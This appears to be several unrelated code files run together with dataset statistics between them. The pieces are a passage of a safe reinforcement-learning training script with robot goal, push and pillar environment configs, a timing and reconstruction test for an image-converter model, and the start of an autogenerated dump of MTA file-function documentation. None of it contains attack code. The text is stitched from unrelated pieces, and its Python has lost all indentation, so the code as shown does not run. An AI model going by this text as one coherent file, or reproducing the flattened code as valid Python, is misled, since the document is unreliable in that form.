epochs = int(num_steps / steps_per_epoch)
save_freq = 50
target_kl = 0.01
cost_lim = 0
# Fork for parallelizing
mpi_fork(cpu)
# Prepare Logger
logger_kwargs = setup_logger_kwargs(exp_name, seed)
# Algo and Env
algo = eval('safe_rl.'+algo)
if task == "Mygoal1":
# finite time convergence test suite
# config = {
# 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
# # finite time convergence test suite modification
# 'robot_placements': None, # Robot placements list (defaults to full extents)
# 'robot_locations': [[0.0, 0.0]], # Explicitly place robot XY coordinate
# 'robot_keepout': 0.0, # Needs to be set to match the robot XML used
# # Hazardous areas
# 'hazards_placements': None, # Placements list for hazards (defaults to full extents)
# 'hazards_locations': [[-0.3, -0.3]], # Fixed locations to override placements
# 'hazards_keepout': 0.0, # Radius of hazard keepout for placement
# 'hazards_num': 1,
# 'hazards_size': 0.5,
# 'task': 'goal',
# 'observation_flatten': True, # Flatten observation into a vector
# 'observe_sensors': True, # Observe all sensor data from simulator
# # Sensor observations
# # Specify which sensors to add to observation space
# 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
# 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
# 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
# 'sensors_angle_components': True, # Observe sin/cos theta instead of theta
# #observe goal/box/...
# 'observe_goal_dist': False, # Observe the distance to the goal
# 'observe_goal_comp': False, # Observe a compass vector to the goal
# 'observe_goal_lidar': True, # Observe the goal with a lidar sensor
# 'observe_box_comp': False, # Observe the box with a compass
# 'observe_box_lidar': False, # Observe the box with a lidar
# 'observe_circle': False, # Observe the origin with a lidar
# 'observe_remaining': False, # Observe the fraction of steps remaining
# 'observe_walls': False, # Observe the walls with a lidar space
# 'observe_hazards': True, # Observe the vector from agent to hazards
# 'observe_vases': True, # Observe the vector from agent to vases
# 'observe_pillars': False, # Lidar observation of pillar object positions
# 'observe_buttons': False, # Lidar observation of button object positions
# 'observe_gremlins': False, # Gremlins are observed with lidar-like space
# 'observe_vision': False, # Observe vision from the robot
# # Constraints - flags which can be turned on
# # By default, no constraints are enabled, and all costs are indicator functions.
# 'constrain_hazards': True, # Constrain robot from being in hazardous areas
# 'constrain_vases': False, # Constrain frobot from touching objects
# 'constrain_pillars': False, # Immovable obstacles in the environment
# 'constrain_buttons': False, # Penalize pressing incorrect buttons
# 'constrain_gremlins': False, # Moving objects that must be avoided
# # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
# 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
# #lidar setting
# 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
# 'lidar_num_bins': 16,
# #num setting
# 'vases_num': 0,
# # dt perhaps?
# # Frameskip is the number of physics simulation steps per environment step
# # Frameskip is sampled as a binomial distribution
# # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
# 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
# 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
# }
config = {
'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
'task': 'goal',
'observation_flatten': True, # Flatten observation into a vector
'observe_sensors': True, # Observe all sensor data from simulator
# Sensor observations
# Specify which sensors to add to observation space
'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
'sensors_angle_components': True, # Observe sin/cos theta instead of theta
#observe goal/box/...
'observe_goal_dist': False, # Observe the distance to the goal
'observe_goal_comp': False, # Observe a compass vector to the goal
'observe_goal_lidar': True, # Observe the goal with a lidar sensor
'observe_box_comp': False, # Observe the box with a compass
'observe_box_lidar': False, # Observe the box with a lidar
'observe_circle': False, # Observe the origin with a lidar
'observe_remaining': False, # Observe the fraction of steps remaining
'observe_walls': False, # Observe the walls with a lidar space
'observe_hazards': True, # Observe the vector from agent to hazards
'observe_vases': True, # Observe the vector from agent to vases
'observe_pillars': False, # Lidar observation of pillar object positions
'observe_buttons': False, # Lidar observation of button object positions
'observe_gremlins': False, # Gremlins are observed with lidar-like space
'observe_vision': False, # Observe vision from the robot
# Constraints - flags which can be turned on
# By default, no constraints are enabled, and all costs are indicator functions.
'constrain_hazards': True, # Constrain robot from being in hazardous areas
'constrain_vases': False, # Constrain frobot from touching objects
'constrain_pillars': False, # Immovable obstacles in the environment
'constrain_buttons': False, # Penalize pressing incorrect buttons
'constrain_gremlins': False, # Moving objects that must be avoided
# cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
#lidar setting
'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
'lidar_num_bins': 16,
#num setting
'hazards_num': 1,
'hazards_size': args.hazards_size,
'vases_num': 0,
# Frameskip is the number of physics simulation steps per environment step
# Frameskip is sampled as a binomial distribution
# For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
}
if task == "Mygoal4":
config = {
'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
'task': 'goal',
'observation_flatten': True, # Flatten observation into a vector
'observe_sensors': True, # Observe all sensor data from simulator
# Sensor observations
# Specify which sensors to add to observation space
'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
'sensors_angle_components': True, # Observe sin/cos theta instead of theta
#observe goal/box/...
'observe_goal_dist': False, # Observe the distance to the goal
'observe_goal_comp': False, # Observe a compass vector to the goal
'observe_goal_lidar': True, # Observe the goal with a lidar sensor
'observe_box_comp': False, # Observe the box with a compass
'observe_box_lidar': False, # Observe the box with a lidar
'observe_circle': False, # Observe the origin with a lidar
'observe_remaining': False, # Observe the fraction of steps remaining
'observe_walls': False, # Observe the walls with a lidar space
'observe_hazards': True, # Observe the vector from agent to hazards
'observe_vases': True, # Observe the vector from agent to vases
'observe_pillars': False, # Lidar observation of pillar object positions
'observe_buttons': False, # Lidar observation of button object positions
'observe_gremlins': False, # Gremlins are observed with lidar-like space
'observe_vision': False, # Observe vision from the robot
# Constraints - flags which can be turned on
# By default, no constraints are enabled, and all costs are indicator functions.
'constrain_hazards': True, # Constrain robot from being in hazardous areas
'constrain_vases': False, # Constrain frobot from touching objects
'constrain_pillars': False, # Immovable obstacles in the environment
'constrain_buttons': False, # Penalize pressing incorrect buttons
'constrain_gremlins': False, # Moving objects that must be avoided
# cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
#lidar setting
'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
'lidar_num_bins': 16,
#num setting
'hazards_num': 4,
'hazards_size': args.hazards_size,
'vases_num': 0,
# Frameskip is the number of physics simulation steps per environment step
# Frameskip is sampled as a binomial distribution
# For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
}
if task == "Mypush4":
config = {
'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
'task': 'push',
'box_size': 0.2,
'box_null_dist': 0,
'observation_flatten': True, # Flatten observation into a vector
'observe_sensors': True, # Observe all sensor data from simulator
# Sensor observations
# Specify which sensors to add to observation space
'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
'sensors_angle_components': True, # Observe sin/cos theta instead of theta
#observe goal/box/...
'observe_goal_dist': False, # Observe the distance to the goal
'observe_goal_comp': False, # Observe a compass vector to the goal
'observe_goal_lidar': True, # Observe the goal with a lidar sensor
'observe_box_comp': False, # Observe the box with a compass
'observe_box_lidar': True, # Observe the box with a lidar
'observe_circle': False, # Observe the origin with a lidar
'observe_remaining': False, # Observe the fraction of steps remaining
'observe_walls': False, # Observe the walls with a lidar space
'observe_hazards': True, # Observe the vector from agent to hazards
'observe_vases': True, # Observe the vector from agent to vases
'observe_pillars': False, # Lidar observation of pillar object positions
'observe_buttons': False, # Lidar observation of button object positions
'observe_gremlins': False, # Gremlins are observed with lidar-like space
'observe_vision': False, # Observe vision from the robot
# Constraints - flags which can be turned on
# By default, no constraints are enabled, and all costs are indicator functions.
'constrain_hazards': True, # Constrain robot from being in hazardous areas
'constrain_vases': False, # Constrain frobot from touching objects
'constrain_pillars': False, # Immovable obstacles in the environment
'constrain_buttons': False, # Penalize pressing incorrect buttons
'constrain_gremlins': False, # Moving objects that must be avoided
# cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
#lidar setting
'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
'lidar_num_bins': 16,
#num setting
'hazards_num': 4,
'hazards_size': args.hazards_size,
'vases_num': 0,
# Frameskip is the number of physics simulation steps per environment step
# Frameskip is sampled as a binomial distribution
# For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
}
if task == "Mypush1":
config = {
'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
'task': 'push',
'box_size': 0.2,
'box_null_dist': 0,
'observation_flatten': True, # Flatten observation into a vector
'observe_sensors': True, # Observe all sensor data from simulator
# Sensor observations
# Specify which sensors to add to observation space
'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
'sensors_angle_components': True, # Observe sin/cos theta instead of theta
#observe goal/box/...
'observe_goal_dist': False, # Observe the distance to the goal
'observe_goal_comp': False, # Observe a compass vector to the goal
'observe_goal_lidar': True, # Observe the goal with a lidar sensor
'observe_box_comp': False, # Observe the box with a compass
'observe_box_lidar': True, # Observe the box with a lidar
'observe_circle': False, # Observe the origin with a lidar
'observe_remaining': False, # Observe the fraction of steps remaining
'observe_walls': False, # Observe the walls with a lidar space
'observe_hazards': True, # Observe the vector from agent to hazards
'observe_vases': True, # Observe the vector from agent to vases
'observe_pillars': False, # Lidar observation of pillar object positions
'observe_buttons': False, # Lidar observation of button object positions
'observe_gremlins': False, # Gremlins are observed with lidar-like space
'observe_vision': False, # Observe vision from the robot
# Constraints - flags which can be turned on
# By default, no constraints are enabled, and all costs are indicator functions.
'constrain_hazards': True, # Constrain robot from being in hazardous areas
'constrain_vases': False, # Constrain frobot from touching objects
'constrain_pillars': False, # Immovable obstacles in the environment
'constrain_buttons': False, # Penalize pressing incorrect buttons
'constrain_gremlins': False, # Moving objects that must be avoided
# cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
#lidar setting
'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
'lidar_num_bins': 16,
#num setting
'hazards_num': 1,
'hazards_size': args.hazards_size,
'vases_num': 0,
# Frameskip is the number of physics simulation steps per environment step
# Frameskip is sampled as a binomial distribution
# For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
}
if task == "Mygoal4_pillars":
config = {
'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
'task': 'goal',
'observation_flatten': True, # Flatten observation into a vector
'observe_sensors': True, # Observe all sensor data from simulator
# Sensor observations
# Specify which sensors to add to observation space
'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
'sensors_angle_components': True, # Observe sin/cos theta instead of theta
#observe goal/box/...
'observe_goal_dist': False, # Observe the distance to the goal
'observe_goal_comp': False, # Observe a compass vector to the goal
'observe_goal_lidar': True, # Observe the goal with a lidar sensor
'observe_box_comp': False, # Observe the box with a compass
'observe_box_lidar': False, # Observe the box with a lidar
'observe_circle': False, # Observe the origin with a lidar
'observe_remaining': False, # Observe the fraction of steps remaining
'observe_walls': False, # Observe the walls with a lidar space
'observe_hazards': False, # Observe the vector from agent to hazards
'observe_vases': False, # Observe the vector from agent to vases
'observe_pillars': True, # Lidar observation of pillar object positions
'observe_buttons': False, # Lidar observation of button object positions
'observe_gremlins': False, # Gremlins are observed with lidar-like space
'observe_vision': False, # Observe vision from the robot
# Constraints - flags which can be turned on
# By default, no constraints are enabled, and all costs are indicator functions.
'constrain_hazards': False, # Constrain robot from being in hazardous areas
'constrain_vases': False, # Constrain frobot from touching objects
'constrain_pillars': True, # Immovable obstacles in the environment
'constrain_buttons': False, # Penalize pressing incorrect buttons
'constrain_gremlins': False, # Moving objects that must be avoided
# cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
#lidar setting
'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
'lidar_num_bins': 16,
#num setting
'hazards_num': 0,
'hazards_size': args.hazards_size,
'vases_num': 0,
# Pillars (immovable obstacles we should not touch)
# 'robot_keepout': 0.4,
'pillars_num': 4, # Number of pillars in the world
'pillars_placements': None, # Pillars placements list (defaults to full extents)
# 'pillars_locations': [], # Fixed locations to override placements
'pillars_keepout': 0.4, # Radius for placement of pillars
'pillars_size': args.pillars_size, # Half-size (radius) of pillar objects
'pillars_height': 0.5, # Half-height of pillars geoms
'pillars_cost': 1.0, # Cost (per step) for being in contact with a pillar
# Frameskip is the number of physics simulation steps per environment step
# Frameskip is sampled as a binomial distribution
# For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
}
if task == "Mygoal1_pillars":
config = {
'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point
'task': 'goal',
'observation_flatten': True, # Flatten observation into a vector
'observe_sensors': True, # Observe all sensor data from simulator
# Sensor observations
# Specify which sensors to add to observation space
'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'],
'sensors_hinge_joints': True, # Observe named joint position / velocity sensors
'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors
'sensors_angle_components': True, # Observe sin/cos theta instead of theta
#observe goal/box/...
'observe_goal_dist': False, # Observe the distance to the goal
'observe_goal_comp': False, # Observe a compass vector to the goal
'observe_goal_lidar': True, # Observe the goal with a lidar sensor
'observe_box_comp': False, # Observe the box with a compass
'observe_box_lidar': False, # Observe the box with a lidar
'observe_circle': False, # Observe the origin with a lidar
'observe_remaining': False, # Observe the fraction of steps remaining
'observe_walls': False, # Observe the walls with a lidar space
'observe_hazards': False, # Observe the vector from agent to hazards
'observe_vases': False, # Observe the vector from agent to vases
'observe_pillars': True, # Lidar observation of pillar object positions
'observe_buttons': False, # Lidar observation of button object positions
'observe_gremlins': False, # Gremlins are observed with lidar-like space
'observe_vision': False, # Observe vision from the robot
# Constraints - flags which can be turned on
# By default, no constraints are enabled, and all costs are indicator functions.
'constrain_hazards': False, # Constrain robot from being in hazardous areas
'constrain_vases': False, # Constrain frobot from touching objects
'constrain_pillars': True, # Immovable obstacles in the environment
'constrain_buttons': False, # Penalize pressing incorrect buttons
'constrain_gremlins': False, # Moving objects that must be avoided
# cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable.
'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost.
#lidar setting
'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance)
'lidar_num_bins': 16,
#num setting
'hazards_num': 0,
'hazards_size': args.hazards_size,
'vases_num': 0,
# Pillars (immovable obstacles we should not touch)
# 'robot_keepout': 0.4,
'pillars_num': 1, # Number of pillars in the world
'pillars_placements': None, # Pillars placements list (defaults to full extents)
# 'pillars_locations': [], # Fixed locations to override placements
'pillars_keepout': 0.4, # Radius for placement of pillars
'pillars_size': args.pillars_size, # Half-size (radius) of pillar objects
'pillars_height': 0.5, # Half-height of pillars geoms
'pillars_cost': 1.0, # Cost (per step) for being in contact with a pillar
# Frameskip is the number of physics simulation steps per environment step
# Frameskip is sampled as a binomial distribution
# For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip)
'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip)
'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution)
}
algo(env_fn=lambda: Engine(config),
ac_kwargs=dict(
hidden_sizes=(256, 256),
),
epochs=epochs,
steps_per_epoch=steps_per_epoch,
save_freq=save_freq,
target_kl=target_kl,
cost_lim=cost_lim,
seed=seed,
logger_kwargs=logger_kwargs,
margin=args.margin,
threshold=args.threshold,
ctrlrange=args.ctrlrange,
# adaptive safety index,
k = args.k,
n = args.n,
sigma = args.sigma,
cpc = args.cpc,
cpc_coef = args.cpc_coef,
pre_execute = args.pre_execute,
pre_execute_coef = args.pre_execute_coef
)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--robot', type=str, default='Point')
parser.add_argument('--task', type=str, default='myGoal1')
parser.add_argument('--algo', type=str, default='ppo')
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--index', type=str, default='adaptive') # ['adaptive', 'projection_max', 'projection_argmin']
parser.add_argument('--k', type=float, default=2.0)
parser.add_argument('--n', type=float, default=2.0)
parser.add_argument('--hazards_size', type=float, default=0.30)
parser.add_argument('--pillars_size', type=float, default=0.30)
parser.add_argument('--sigma', type=float, default=0.04)
parser.add_argument('--margin', type=float, default=0.4)
parser.add_argument('--ctrlrange', type=float, default=10.0)
parser.add_argument('--threshold', type=float, default=0.0)
parser.add_argument('--pre_execute', type=bool, default=False)
parser.add_argument('--pre_execute_coef', type=float, default=0.0)
parser.add_argument('--cpc', type=bool, default=False)
parser.add_argument('--cpc_coef', type=float, default=0.01)
parser.add_argument('--exp_name', type=str, default='')
parser.add_argument('--cpu', type=int, default=1)
args = parser.parse_args()
exp_name = args.exp_name if not(args.exp_name=='') else None
main(args.robot, args.task, args.algo, args.seed, exp_name, args.cpu, args)
| 58.381271
| 473
| 0.619586
| 4,116
| 34,912
| 5.095481
| 0.076288
| 0.022696
| 0.031469
| 0.012969
| 0.892528
| 0.881848
| 0.878844
| 0.875316
| 0.868641
| 0.864826
| 0
| 0.011108
| 0.283112
| 34,912
| 598
| 474
| 58.381271
| 0.826874
| 0.43624
| 0
| 0.720222
| 0
| 0
| 0.265651
| 0.007463
| 0
| 0
| 0
| 0
| 0.00831
| 1
| 0.00277
| false
| 0
| 0.019391
| 0
| 0.022161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d5c4f2fdfe6d5f445621527a317b398c68e3889
| 4,558
|
py
|
Python
|
src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/FastModel/test.py
|
janden/ASPIRE-Python
|
5bcf831881fd0e42630c3b99671c5ed08de260ea
|
[
"MIT"
] | null | null | null |
src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/FastModel/test.py
|
janden/ASPIRE-Python
|
5bcf831881fd0e42630c3b99671c5ed08de260ea
|
[
"MIT"
] | null | null | null |
src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/FastModel/test.py
|
janden/ASPIRE-Python
|
5bcf831881fd0e42630c3b99671c5ed08de260ea
|
[
"MIT"
] | null | null | null |
import numpy as np
from ConverterModel.Converter import Converter
from scipy.misc import imresize
import time
import os
def test():
data_path = os.path.join(os.pardir, 'test_data', 'example_data_np_array.npy')
images = np.load(data_path)
num_images = images.shape[2]
bandlimit_ratio = 1.0
truncation_parameter = 1
resolutions = [16, 32, 64]
images_multiplier = 100
n = images_multiplier * num_images
for resolution in resolutions:
# testing with odd grid
scaled_images = np.zeros((2 * resolution + 1, 2 * resolution + 1, num_images))
for j in range(num_images):
scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution + 1, 2 * resolution + 1))
scaled_images = np.repeat(scaled_images, images_multiplier, axis=2)
print("testing images of size {}".format(scaled_images.shape[0]))
tic1 = time.clock()
converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio)
tic2 = time.clock()
converter.init_fast()
tic3 = time.clock()
converter.init_direct()
print("finished initializing the model in {} sec, the PSWF2D took {} seconds".format(tic3 - tic1, tic2 - tic1))
# test if coefficients are the same
tic = time.clock()
coefficients = converter.fast_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t/n
print("finished forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
# test reconstruction error
tic = time.clock()
reconstructed_images = converter.direct_backward(coefficients)
toc = time.clock()
t = toc - tic
tpi = t / n
print("finished backward of {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
x_1d_grid = range(-resolution, resolution + 1)
x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid)
r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid))
points_inside_the_circle = r_2d_grid <= resolution
err = reconstructed_images - scaled_images
e = np.mean(np.square(np.absolute(err)), axis=2)
e = np.sum(e[points_inside_the_circle])
p = np.mean(np.square(np.absolute(scaled_images)), axis=2)
p = np.sum(p[points_inside_the_circle])
print("odd images with resolution {} fast coefficients reconstructed error: {}\n".format(resolution, e / p))
# testing with even grid
scaled_images = np.zeros((2 * resolution, 2 * resolution, num_images))
for j in range(num_images):
scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution, 2 * resolution))
scaled_images = np.repeat(scaled_images, images_multiplier, axis=2)
print("testing images of size {}".format(scaled_images.shape[0]))
tic1 = time.clock()
converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio)
tic2 = time.clock()
converter.init_fast()
tic3 = time.clock()
converter.init_direct()
print("finished initializing the model in {} sec, the PSWF2D took {} seconds".format(tic3 - tic1, tic2 - tic1))
# test if coefficients are the same
tic = time.clock()
coefficients = converter.fast_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t/n
print("finished forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
# test reconstruction error
tic = time.clock()
reconstructed_images = converter.direct_backward(coefficients)
toc = time.clock()
t = toc - tic
tpi = t / n
print("finished backward of {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
x_1d_grid = range(-resolution, resolution)
x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid)
r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid))
points_inside_the_circle = r_2d_grid <= resolution
err = reconstructed_images - scaled_images
e = np.mean(np.square(np.absolute(err)), axis=2)
e = np.sum(e[points_inside_the_circle])
p = np.mean(np.square(np.absolute(scaled_images)), axis=2)
p = np.sum(p[points_inside_the_circle])
print("even images with resolution {} fast coefficients reconstructed error: {}\n".format(resolution, e / p))
test()
| 41.063063
| 119
| 0.637999
| 607
| 4,558
| 4.616145
| 0.176277
| 0.077088
| 0.038544
| 0.044968
| 0.8601
| 0.8601
| 0.850821
| 0.826552
| 0.826552
| 0.826552
| 0
| 0.02039
| 0.246819
| 4,558
| 110
| 120
| 41.436364
| 0.795805
| 0.035981
| 0
| 0.714286
| 0
| 0
| 0.153864
| 0.005699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011905
| false
| 0
| 0.059524
| 0
| 0.071429
| 0.119048
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2db46071150b79b9805c45839cfc3233c0e65e02
| 64,695
|
py
|
Python
|
functions/file_functions.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | null | null | null |
functions/file_functions.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | 1
|
2021-02-24T21:50:18.000Z
|
2021-02-24T21:50:18.000Z
|
functions/file_functions.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | null | null | null |
# Autogenerated file. ANY CHANGES WILL BE OVERWRITTEN
from to_python.core.types import FunctionType, \
FunctionArgument, \
FunctionArgumentValues, \
FunctionReturnTypes, \
FunctionSignature, \
FunctionDoc, \
FunctionData, \
CompoundFunctionData
DUMP_PARTIAL = [
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileClose',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Closes a file handle obtained by fileCreate or fileOpen.' ,
arguments={
"theFile": """The file handle to close. """
},
result='returns true if successful, false otherwise.' ,
),
url='fileClose',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileClose',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theFile',
argument_type=FunctionType(
names=['file'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Closes a file handle obtained by fileCreate or fileOpen.' ,
arguments={
"theFile": """The file handle to close. """
},
result='returns true if successful, false otherwise.' ,
),
url='fileClose',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileCopy',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='copyToFilePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='overwrite',
argument_type=FunctionType(
names=['bool'],
is_optional=True,
),
default_value='false',
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='This function copies a file.{{Note|The file functions should not be used to implement configuration files. It is encouraged to use the XML functions for this instead.}}' ,
arguments={
"filePath": """: The path of the file you want to copy. """,
"copyToFilePath": """: Where to copy the specified file to. """,
"overwrite": """: If set to true it will overwrite a file that already exists at copyToFilePath. """
},
result='return true if the file was copied, else false if the filepath doesnt exist.' ,
),
url='fileCopy',
)
],
client=[
FunctionData(
signature=FunctionSignature(
name='fileCopy',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['bool'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='copyToFilePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='overwrite',
argument_type=FunctionType(
names=['bool'],
is_optional=True,
),
default_value='false',
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='This function copies a file.{{Note|The file functions should not be used to implement configuration files. It is encouraged to use the XML functions for this instead.}}' ,
arguments={
"filePath": """: The path of the file you want to copy. """,
"copyToFilePath": """: Where to copy the specified file to. """,
"overwrite": """: If set to true it will overwrite a file that already exists at copyToFilePath. """
},
result='return true if the file was copied, else false if the filepath doesnt exist.' ,
),
url='fileCopy',
)
],
),
CompoundFunctionData(
server=[
FunctionData(
signature=FunctionSignature(
name='fileCreate',
return_types=FunctionReturnTypes(
return_types=[
FunctionType(
names=['file'],
is_optional=False,
)
],
variable_length=False,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='filePath',
argument_type=FunctionType(
names=['string'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
generic_types=[
],
),
docs=FunctionDoc(
description='Creates a new file in a directory of a resource. If there already exists a file with the specified name, it is overwritten with an empty file.' ,
arguments={
"filePath": """The filepath of the file to be created in the following format: :resourceName/path. resourceName is the name of the resource the file is in, and path is the path from the root directory of the resource to the file.
:For example, if you want to create a file named 'myfile.txt' in the resource 'mapcreator', it can be created from another resource this way: ''fileCreate(":mapcreator/myfile.txt")''.
